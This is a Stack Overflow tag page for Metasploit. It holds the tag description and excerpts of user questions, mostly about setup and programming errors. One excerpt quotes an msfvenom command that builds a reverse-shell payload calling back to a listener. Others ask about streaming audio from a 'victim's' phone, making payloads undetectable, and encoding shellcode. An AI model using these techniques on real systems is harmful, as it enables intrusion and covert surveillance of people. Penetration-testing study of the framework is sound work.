Questions tagged [metasploit]

This tag is for questions about *programming* the Metasploit framework, not for using the framework or attacking a specific site.

The Metasploit Framework is an open-source project owned/sponsored by Rapid7 for vulnerability assessment, exploitation development, penetration testing, and many other computer and network security-related tasks.

Since version 3 of the Framework, Metasploit has been written primarily in Ruby. Version 2 and older were written in Perl. The various payloads, stagers, and shellcodes are primarily written in C, assembly, and Java.

Metasploit is developed on Github. Documentation and community forums are available on Rapid7's community site. Questions can also be asked in the #metasploit channel on Freenode.

If your question is about using Metasploit, rather than programming with it, then it should probably go on our sister site Information Security.

If your question is about attacking a specific system, such questions are off-topic on Stack Overflow. They are also off-topic on Information Security unless they demonstrate an understanding of the concepts involved and clearly identify a specific problem.

Also, any issues resulting from using such tools without permission from the target are your own risk; we do not endorse such actions in any way.

228 questions
0
votes
1 answer

Cannot define aliases in metasploit framework docker image

I'm trying to use the Docker metasploit image within my own Dockerfile config which is this one: FROM metasploitframework/metasploit-framework WORKDIR /usr/src/my-awesome-tool COPY . . RUN pip3 install --upgrade pip RUN pip3 install --editable…
Andrés Montoya
  • 4,079
  • 4
  • 18
  • 33
0
votes
0 answers

Msfvenom use local hostname

I use the command msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.2.100 LPORT=443 -f elf > ./payload to create a linux payload. How can I use for LHOST my local hostname? I tried to use kali instead of 192.168.2.100 but this doesn't…
John Smith
  • 272
  • 1
  • 3
  • 12
0
votes
1 answer

Query returns results when running it individually, returns an ambiguous reference when I add it to a larger query

I am trying to write a query that summarizes vulnerabilities by host name, and includes information about that host. Query is running in Rapid7 InsightVM The query that returns asset information runs successfully, except when I append that query to…
shelum
  • 173
  • 1
  • 2
  • 14
0
votes
0 answers

armitage teamserver tthrowing connection refused on startup ubuntu

I tried every possible answer online! It was running sometime back. OS: Ubuntu 16.04 Error: Warning: checkError(): java.lang.RuntimeException: java.net.ConnectException: Connection refused (Connection refused) at server.sl:450
Mudit
  • 1
  • 2
0
votes
1 answer

How to verify the SSL certificate in pyMetasploit module?

I am using the pyMetasploit module for the remote access of metasploit msfconsole using the example as shown in the link https://github.com/allfro/pymetasploit and I downloaded the metasploit from…
shivakumar
  • 47
  • 2
  • 5
0
votes
1 answer

Bundler could not find compatible versions for gem "sysrandom"

After installing PentestBox for installing penetration testing tools on windows 10 It was working great but some of the tools was outdated like metasploit, so I tried updating all using PentestBox Update Manager, but after finishing the update…
0
votes
1 answer

Metasploit Module NoMethodError undefined method 'get_once' for nil:NilClass

I am running a number of Metasploit modules for exploiting Siemens S7-300/400 and S7-1200 PLCs that were created from a Blackhat talk by Dillion Beresford in 2011. The modules are not supplied with Metasploit but have been added to the…
0
votes
1 answer

Error when running msfconsole in arch linux

I get this error when running msfconsole in arch linux $ msfconsole Could not find rake-12.3.1 in any of the sources Run `bundle install` to install missing gems. I was searching google for the solution and I found out that installing gem…
Yves Gonzaga
  • 1,038
  • 1
  • 16
  • 40
0
votes
0 answers

How to stream audio from victim's phone with metasploit ruby script

I want to make a microphone audio stream in metasploit like webcam_stream, so I added some codes to the ruby script at : (/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb). The added piece of…
mohamed
  • 231
  • 1
  • 13
0
votes
0 answers

metasploit python payload code error

I am trying to make an undetectable executable with metasploit, metasploit makes the exploit, I make it undetectable, but it seems like metasploit failed his only task: I just got it from msvenom, tried to run it and I get the error: File…
0
votes
1 answer

What is the default payload for an exploit in Metasploit?

Is there any default payload (if not set explicitly) which gets executed for an exploit in Metasploit?
Tanu Jain
  • 107
  • 1
  • 3
  • 11
0
votes
0 answers

metasploit payload for android creates an empty apk file

I've been trying to make a payload for android and all i get is an empty apk file. I have a python code which executes the command. The same command works when executed on the terminal. What could be the problem? os.system('msfvenom -p…
MoKG
  • 266
  • 3
  • 13
0
votes
1 answer

How to add module in Metasploit?

I'm using Metasploit on Windows, but I can't load ms17_010_eternalblue. So I download it from github. How can I add that modules to my Metasploit?
budi
  • 9
  • 1
  • 5
0
votes
0 answers

Metasploit on Ubuntu 14.04 msfrpcd Gemfile "Can't modify frozen String" error

I followed the tutorial at https://www.darkoperator.com/installing-metasploit-in-ubunt/ I chose rbenv over rvm to install Ruby. The installer led me to install ruby 2.4.2. #ruby -v ruby 2.4.2p198 (2017-09-14 revision 59899) [x86_64-linux] #rbenv…
briansyph
  • 150
  • 11
0
votes
1 answer

Decoding Shellcode from MSFvenom(xor x64)?

Encoding the shellcode three times using the x64 xor Encoder I'm writing my own exploit and I've wondered if I need to decode the shellcode when adding it in my program or is the decoder stub inside of the shellcode already? If I need to decode, how…
pr0f3ss
  • 527
  • 1
  • 4
  • 17